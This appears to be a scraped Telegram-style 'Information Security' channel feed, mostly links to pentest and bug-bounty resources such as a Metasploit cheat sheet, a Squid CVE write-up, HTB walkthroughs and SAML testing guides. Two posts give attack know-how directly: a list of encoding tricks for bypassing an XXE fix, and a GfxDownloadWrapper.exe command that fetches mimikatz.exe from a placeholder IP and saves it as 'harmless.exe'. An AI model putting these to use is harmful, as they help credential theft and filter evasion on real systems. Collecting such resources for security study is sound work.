Information Security

DHCP stands for Dynamic Host Configuration Protocol and a DHCP server dynamically assigns an IP address to enable hosts (DHCP Clients). Basically, the DHCP server reduces the

106 views17:25

Bypass Fix of OB XXE Using Different encoding and get 2x bounty
😁

1. Encode Payload to UTF-7
2. Encode Payload to UTF-16
3. Encode Payload to UTF-16BE

- Try with other encodings as well, if accepted by the XML parser.

120 views17:32

Information Security

https://pentestmag.com/metasploit-cheat-sheet/

Pentestmag

Metasploit Cheat Sheet - Pentestmag

Metasploit Cheat Sheet by Tim Keary Widely reputed as the most used penetration testing framework, Metasploit helps security teams identify …

106 views17:56

Information Security

https://medium.com/threat-hunters-forge/threat-hunter-playbook-mordor-datasets-binderhub-open-infrastructure-for-open-8c8aee3d8b4

Medium

Threat Hunter Playbook ⚔ + Mordor Datasets 📜 + BinderHub 🌎 = Open Infrastructure 🏗 for Open Hunts 🏹 💜

It has been almost three years since I started documenting detections publicly, and I always wondered “How could I share detections in a…

104 views18:04

Information Security

https://www.thezdi.com/blog/2019/8/22/cve-2019-12527-code-execution-on-squid-proxy-through-a-heap-buffer-overflow

Zero Day Initiative

Zero Day Initiative — CVE-2019-12527: Code Execution on Squid Proxy Through a Buffer Overflow

In this excerpt of a Trend Micro Vulnerability Research Service report, Saran Neti and Sivathmican Sivakumaran of the Trend Micro Research Team detail a recent buffer overflow vulnerability in the Squid web proxy. A remote, unauthenticated attacker could…

94 views18:34

Information Security

https://liberty-shell.com/sec/2019/11/06/living-off-the-land-pt2/

90 views18:35

Information Security

!!!

166 views18:42

Information Security

https://blog.preempt.com/new-ldap-rdp-relay-vulnerabilities-in-ntlm

114 views18:46

Information Security

https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep

GitHub

kernel-exploit-practice/bypass-smep at master · pr0cf5/kernel-exploit-practice

repository for kernel exploit practice. Contribute to pr0cf5/kernel-exploit-practice development by creating an account on GitHub.

103 views18:47

Information Security

https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html

Blogspot

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadg...

104 views16:55

Information Security

https://www.bilibili.com/video/av74857336/

Bilibili

mstsc 漏洞演示_哔哩哔哩_bilibili

mstsc 漏洞演示, 视频播放量 1623、弹幕量 0、点赞数 7、投硬币枚数 6、收藏人数 8、转发人数 9, 视频作者 ssocksd, 作者简介，相关视频：首个Log4j2漏洞免费检测工具实操演示Demo，TeamViewer使用方法TeamViewer怎么用，ms_08067 系统漏洞攻击演示，能打游戏？我愿称它为最强的远程桌面！，如何在一瞬间毁掉一个群！，【千锋】网络安全300集全套视频教程(web安全/渗透测试/黑客攻防/信息安全/代码审计)，网络安全基础入门到精通，【教程】吃饱了撑…

106 views17:06

Information Security

https://github.com/netanel01/ctf-writeups/blob/master/googlectf/2019/pwn_gomium/README.md

GitHub

ctf-writeups/googlectf/2019/pwn_gomium/README.md at master · netanel01/ctf-writeups

Contribute to netanel01/ctf-writeups development by creating an account on GitHub.

110 views17:47

Information Security

https://2018.zeronights.ru/en/materials/

106 views17:49

Information Security

https://snowscan.io/htb-writeup-jarvis/

https://www.youtube.com/watch?v=YHHWvXBfwQ8

snowscan.io

Jarvis - Hack The Box

The entrypoint for Jarvis is an SQL injection vulnerability in the web application to book hotel rooms. There is a WAF but I was able to easily get around it by lowering the amount of requests per second in sqlmap and changing the user-agent header. After…

111 viewsedited 16:09

Information Security

SAML for pentesters:
Part 1 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
Part 2 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
Part 3 -https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/

Common attacks - https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/
Case study - http://economyofmechanism.com/office365-authbypass.html

#SAML #BugBounty

epi052.gitlab.io

How to Hunt Bugs in SAML; a Methodology - Part I -

The first in a series of three posts about a methodology for hunting bugs in SAML. This post covers background information about SAML, laying the groundwork to understand SAML vulnerabilities and attacks.

113 views16:13

Information Security

DKMC presentation 2017.pdf

5.5 MB

147 views16:14

Information Security

https://github.com/r4wd3r/RID-Hijacking

GitHub

GitHub - r4wd3r/RID-Hijacking: Windows RID Hijacking persistence technique

Windows RID Hijacking persistence technique. Contribute to r4wd3r/RID-Hijacking development by creating an account on GitHub.

123 views17:46

Information Security

file downloader (Intel Graphics Driver for Windows 10)

GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"

122 views17:48

Information Security

https://medium.com/redteam/stealing-jwts-in-localstorage-via-xss-6048d91378a0

Medium

Stealing JWTs in localStorage via XSS

Over the last few months, I’ve come across some implementations of JSON Web Tokens (JWTs) that have ultimately led to compromise of the…

105 views17:52

Information Security

evilarc lets you create a zip file that contains files with directory traversal characters in their embedded path.

Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function

https://github.com/ptoomey3/evilarc

#BugBounty

GitHub

GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilities

Create tar/zip archives that can exploit directory traversal vulnerabilities - ptoomey3/evilarc

117 views17:53

About

Blog

Apps

Platform